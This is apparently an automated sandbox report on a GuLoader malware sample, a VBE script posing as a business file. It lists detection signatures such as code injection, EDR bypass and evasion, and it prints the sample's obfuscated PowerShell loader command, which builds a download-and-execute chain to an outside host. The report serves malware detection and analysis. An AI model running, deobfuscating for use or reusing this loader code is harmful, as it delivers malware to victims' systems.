Windows Analysis Report
EL-25-536_40005512_Le Cuivre_23102024.vbe
Overview
General Information
Detection
GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7100 cmdline:
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 6044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Bishop ing Kropsv isitering Privateje Espying Ge nes Gossip ingly #>;$ Scarifies1 17='Sammen snredes';< #Barometri ske Sardan apalian Cu stomiser M iljteknike ren Unwrit ten #>;$Ab ovedeck=$A utografsam lers+$host .UI; funct ion Plumet ($Pendultr afik){If ( $Abovedeck ) {$Beedig elsers++;} $Superinsi stently=$P roelectric +$Pendultr afik.'Leng th'-$Beedi gelsers; f or( $Melol onthine=5; $Melolonth ine -lt $S uperinsist ently;$Mel olonthine+ =6){$Swive leye=$Melo lonthine;$ Warks+=$Pe ndultrafik [$Melolont hine];$Unc onservativ ely='Mongo lism';}$Wa rks;}funct ion Extral egal($Bost ter){ & ( $Forfdrene s) ($Bostt er);}$Rese rvationssl ipper=Plum et 'WgstrM BoyaroKujo nzCorpsiRe diglFo mel Non,oaBene d/Mah r '; $Reservati onsslipper +=Plumet ' Lsesu5Knub s. Cl p0Ti dv. s til( .esknW Ind ii rosn Ly indFlaunok oncewaugme spanto Rek noNHvekoTf ila Kniks1 Dolkh0Apne a. ilja0Qu ali;B lki HjallW,pli niR facn G .no6R,lak4 Zygne;Glen d retrxAss ur6Bibli4S .ear; Mask Camstrrek orv taxi:e nsky1Udste 3Nob l1Tem pt.Hamar0D el b)Perp PharmGUnbu seNyas,c o ntok Aurio Emitt/Kofa n2Udrik0In dig1 Plug0 ove,f0 Res p1Godke0fi ske1Bicyc FrerF econ i .ermrRek .neAgatefN touo.ulfa xTenni/,rr iv1 d ta3I nd.u1Knapp .Vin.i0Fld ei ';$Feri egiroens=P lumet 'Van keU Ba ySD iarte Stan RHaand- Am aaKartoG Gr sE alan NBerustOle ac ';$Halm knippernes =Plumet ' astahBagly t Kon tstr ipp.attlsK .teg:Glade /Bet l/Pr mudVamperT elexi Deri vG usceDup le.SpillgO dorsoHebra okupingin talStrikeS la.e. 
Vi e cSamenoB,r bim Ngle/ elemu,rfev cDress?a r ile In.uxO scupTympa oPaastrRer oltAerop=s ponsdTangi o SidewCon don.ivillT ilkmoKi.of aVarsedUnm .n&BluebiG ainldDisgu =U,der1Kat suqSamsi6U dtagCPerfe YT end4Me ryoFarveUR epartAllob c Cu loLac t.u Anve- Bil.a Skyp V ShinhLar giAWhisk3 Goom_Unin v BaffULef tiUCeritU GallrKredi fRisikOEmb oONavewB agesqkanur CHaranrDag hod Cod 8T ouch ';$Un predicable ness=Plume t 'Rvert>O shac ';$Fo rfdrenes=P lumet 'Elu iIRen.eeD isruXPreda ';$Melolo nthinetali anation='S ynentognat h';$Klagen 142='\Gesj ftigere.Si g';Extrale gal (Plume t ' Kant$ gestG,opov lAfrivo ga r bAfkrya nil lF rpe :AcculsCou ntTFederET abulNSuben O Hoo TUnv itYU,eskp BegrIK pro sExcerTSou n.=Ut,li$S pencERasca nShittvba uq:czecha KnuspGerrh P.ositDFef niACor ntU pdivAPilsn +Stf,o$Sta tukBort LB ytniAU cal G.ubsiEfol kenkosmo1A f,ik4T att 2 Vacc '); Extralegal (Plumet ' Ekstr$Time GReneglTr iesoParjrB Ev ghA Pho tlOpt d:No nreK H veA AnatoL Con clTha lIEn slaGAnti r so stAF,yp aFRokkeIPe rig= B un$ botchhBl f raShrimL M entMCitrok S,ntiN amm eiOverpP a rplpAutheE EuroprTank enBiko,eTi ldnsCong . angorsR ve